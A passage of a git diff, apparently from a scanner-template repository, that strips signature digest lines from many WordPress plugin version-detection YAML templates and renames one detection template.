490a00463044022050b192331ce5e822e33402dd92a8002f9d5962fc086058a482215fa8ec31adb502203779749438d08de3122ca1acf91eaa6b5d71e616315d9b82bca9ec8f9f89d96d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 242758c719..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052ab1b165373a65038ba5d21657088bc61190c4dbd633b787bafe14872a5be520220209de48da1e61227320ae2e450142291bd5c24f1caf36d0ebfbca616f1af8e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index be11f37b62..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7c325ec42e7b460db367853d16a7b89f71bc6c2cb726da19e69406f9aee847e022038e88ff320bf24e13702b3b6e14b627444a12cd16200b232e39fb2d14f1dabf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 37196f35d3..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e340f466e81bcb1d29bc2aa4e9905cf3fa94a0eac98b175de5182a6f7c580075022100fce1c938bc50f3ec87cbc1b83eb32870f10e5cd6fc08da91eeab1f26ab1ff72e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 072f389604..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220726dfeb1b9aec239a8781a91130662a6c9bbe0b1d2ec6895f08dcf00cd65b38c02206f92900b2194d1b5d6306ec2c9e9762ca10f8ea9032c94a274dd0cf79a163944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index f52ac46b3c..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034c2b56e637f1e917bb28d7161e1697868aa593e5017976991b41b969a8cc55d022043852cf78532243a98502e7afee264a060823b43cf007857a07437932fd2328b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 861281ce9e..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022067410e737af5cf30a97c4ee1b8a6c9399f0db4d0ca0584a0cc16916cf451e8cf02201faa8fa9a10711df21ff5a3e0f4bc06682054d79579a642f762101ef3ebe1d62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 642b41ea90..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2ca75c7396c42a435468465ca5f9c862c8f1119b610c19667bb783fa8929b5c022100cf2337b16d63e5a437490f7772b0a9c9a01e9404b0dd0407c6e96e0cea983431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index fd28201f05..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079e14c32b1b1dcdc5c8dcb9569dca76ee1835a97bf30a7a394eb1ab8b98cf7ec022100a3cf28e73ae7ca74e43f166f322d0ad73f94b0618cbacc75347b579baec72cac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 9001fd747c..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207af2d3226ebe74556cfdb256f7a8114f7f2876394b303d235fd7fd914fc8983502205643add2a051fb0cb856cf215fa8dca28eecd90383c03148d33ef08c00e73f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 324f0a0db9..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024506a35e4a3879be770e15d99b3177cead88fdf829b79791dd6cccfb62947d5022100fb9c6bb1f2fe1da117e6f85796d0f533214d9e206521b822033188cf325ca9c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 2c1de654fe..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001351879f35ffbfc616588ba613f89fe1c29cdd3b7c15fa1e2ea72c54a24643d02202cb7ae5dae42c0b5df3123d7434b21e3de3e119aada7ccc4fceadde9bb210dca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1b097379e1..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205853bfafab9bc4ce91db030acbc31bc432172c03ec7724a027319325b4903e8802207c34979e24a8e94ab7bd37594da35c8bb1fee8f8d631afb7947e2ad91e66d787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 544818b072..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a721fd9533d038a6f2cdcc70cb90b4ef5284c9051866fb9f2bda451d27079bdb022100a1974f14bf5112214149d1a3aead9f9e1943367d19ed377a509f3bf916007c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 3a60595b0e..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025b1b79c11d9c1d05ebebcad7adf413510695b8059975da36d9801f9f815cd3702205c0c54a7309e9c4e359af0b4823e0dbc9b6dc2d57d4e6f06cd80fad5f10208df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 2d9319a746..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c63a8fe7182517e45a40ee901e5f0d075881df55786afa73b2060d4874c8917002204843b014cafede43460ab142e2b774a82ca06d41891b4927bf29a0a5f009d682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index af36497997..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220598a4b568a391728619b731cb348216873a586ad30dbaf54195a741154f1d1ac022100d03389b3c000e3c112e112861bcc9f9df0b35b2a10b7b50815ef0b43c94b9ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index fab20e5b6a..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087f605093b6a11a128e16f4ed25eab0a7a03b68fbb846132f6766cb35774519402200877160a9cf7d0abd9953b634c945859508bd6ca830a7b1eb6eff439a9e33a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index ed9b98966a..45260ccfba 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -1,7 +1,7 @@ id: wordpress-google-listings-and-ads info: - name: Google Listings & Ads Detection + name: Google for WooCommerce Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009004c80984e3f18d57a940ede6d5aee63fef3a352398452a0b127a4e458e7a3f022100e37f1f4ed4a88c06927810f8459b6d98b4c42b469d1e321fd0ca7918df62b0ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 17bfd4c5c5..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100833ff19b9930d0f8c9f206e50843dff7862a23d814f2577f3b09d3084a7ee70a02207bf5566f22d1ae0516df07e88eb47d4d4d22b3b2a0af1d320b355ac68970397b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index ab84ed3c69..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d905fc7ab715040289a6e6516f734706fbb19a1a8b5c32d10e5d481514ca7e99022100de6ff64997091ef385eba7e1b2f88387204504c869a5d93994f222d99af87013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 93c09a7274..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220685907c041d24bb47b1397f231f8b74facea73a0915fa05d7b8ec150fb14cb0f022100fb8cbec5865a6190bc049324679df8c8fc0961b462942b058fa2dfc3fc4a932d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 15db0a0ea5..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073965b5a62d36c00a65166954f32d93eb10b8ebf8a3e0fc541fe71b5558733e4022100b2fe7426281d2ea9f594334cd3087de5d48892feb27f1253dfa2a4c4d558b172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 9e4e6ab046..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000a0b2ca7d1d4b5f9c8f6f8ea2c09291f86ad718c6ad37198ec48a2279b007da0221008f23686fb62adebaa6ccb4e85e67463b9b30ffcece5e788b197be1e61dc1d902:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 8cc2b28970..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f43527e2330cee2af1ad97a41689d5d27d8996680f626a623e6b2fb1c82b4aa022008b443a277469d585425d5a381417922748510213dde4c834680e0b697f5ad98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 7720890f4a..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb35ff3426b9a8fd30d49d585f037137b535cfe2a16ade552e397e4e44f1f50a022100a5aafdda77b048e9f628f6820f0340a161cf51fcd31d6b2c63663770a8482e1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index c8ba1dbde2..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d79aaac98682ebf2a3e6c0f8f819a9e9e88897ae856c78bea8f9efba4dbd1775022038917d76887481cf03aabeec2f05735c4433e66f07da33eedbf8c4605dfb961b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index dc55c2ac99..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d8729c2646d34127745472379934a8fc989c5fe0560399e3034174c2060b8d3022100e75b9fc56d6446f27a9c3aa81cc225d20a679f38003f2045d923bfa689bb1488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 2b20ee07ed..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e3b2754cbadee3dd5f7e1c2838a0d6619419221e025cdfc994680cd8068524c022100a69b286809d775f512eed8c4ea7c5e2a4f7fa13faf2da6a58bca3d0bb8d49eb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 9c506a02b7..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab1ceb4a956e9bcb9a72b41d4446208ccc9b2a96fa0e30611bded45c2f20b279022021b361df6e0433ca4cd6674001ddbe5bcdc21239c82cbc9a597ad279bcf4f3f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 39337323af..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220208540394e8b59ac398ff3c49e91aeaf26a989f52d29434ad298a259254c4e2d022100e6f80dcc1f5e93ca4be6716b7e3fdacbdc119c820534b09dc667603098350219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 52bd19e31d..fea9594fa0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e0c76c0ea35df5a58c7e147b74c1796f2ba9c39a66a4e4c587729c0e220f6c502205d72bd34b12e35eee2b7a279bde1dc23cc5891a00edf575e333593380ac1194a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index a2124fc30d..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa4040da4c1aa871e70dd9602c055cf7d755d1c6fba0d05ae8d8bdaa6573a068022100962e7fd88f63099ce02ee4c2651b7f7863cc3e32be16cdee93d72ce8cad24ff9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 06bcf9ea59..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089bc58bc4129ce6bdb78dc9d38d3ce7fee1658c7d23f13ec65ea4f75d2eeffbc02202c4f1d0850fc0ef3e9bfbdb28f24e04342ab94c71fc4dcea62e3046979e465df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 001b07a21d..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e780a16126f9f43592d550e52a8eb7eaed53f8a98a986edba66aa92b02e3b9b022100eb9b180a935869cd40fa26f1c708787969b70b8f50bd5497337970fa35507f97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 64ec4d3c59..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d28b207cf3fc9424019480527fb8ff919c41a6d374483392ce1aeea10b7d16bf022019a214f0de7fcb5d692bef02d7145c764fe44235d596e28cd72d4a220e42ce30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 4fc8928424..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a49bf9c11bb4d02e87918909aa06c5decd148f64f415c61965ca5430bd359be00221009e30a15356ef267087edecbf84b7add8133a16808905cf82a64291309fdd6480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 10714c55c2..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034a119cfe0bacb0ed488c3e60106439242fd4d7625bfd6c170973bd2a9c06f2a0220083874feb12afd52670ca093350dae4c9ad6f98e6da3484dc8dbbca826e285a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index ad8d521217..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e963f7bdae29ff13464d2c8a5028c7ed4d8b63709739ac33461760dee4acef8002205d4046947b24660697e447ddce947c4756628c45883b13cca38829ddbbdfc2a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 0ecfdff6d1..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e6fc045d4684f2dad2714253358455631ca5b6a9e14757ec18529d0214a7a6a1022100e861870b0d1cd207a82b434fdb93cbf56ad237f54184500af42e3cc78db048bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 7ea1d9b3df..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c6cf227382940b5b666d68a8a46a1c58ae691db1d9d25a88863837ef6acaaf4c022038fa14e06b4234b2e318b3cb9d4f21b60415cab490468ad9c2d657f9a210501e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 4a6ec169a0..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df3da4544cd710227e0f280f86e481734adce69e5accfedbea9dbc54539531e3022100c35420ed5a0f819e6cc75b15dddbff8ce7c2feeb3f59148606f30ee91b048729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 45f93f5b39..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df9cf2e61ea3fe77340086a8b66b9e0f77b9f508c65365690921dbac2b7877cc022100bbaf949b6c9ed5e00fa8a5081ef62b8151f9d1e5fc8a8fa9d87983404656bd4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index b68a177fd2..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220300e6bb539dcffc109522057f2a3b40531ff80ae015efa7b151253f3c74102ce022100c522cafd8d091b031c81b569fbb981b790db3d58e9b7a5ca5e31c0fb8ec80d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 812ee32444..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220468fa266edea85db7a70ab0b7c5d86f26b57edab981cf57e66eb73f043c08d0e022100d74306187c73e31b135b2cc47874e111f004f575825cdadcf36aae575734be0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index c156208109..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100851a7260a4c6753991ffbcb33a1431e0ce4b8907b957a26aaa1f1cf3052b6c3502205c344d14979d829c8553ce4d28542717a74e46a07c0f0daf35499d5e484d784b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 946f1bf644..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4fc2c5f24d72168f55a31cff8d8b9594ad7663cd3bc421fbcb93c3476c6caea022100dea326751adb4e6d3abe894e3d79bda4bec7bafdc83683f15ab10ddede0ec9f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 40c1524b3c..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml 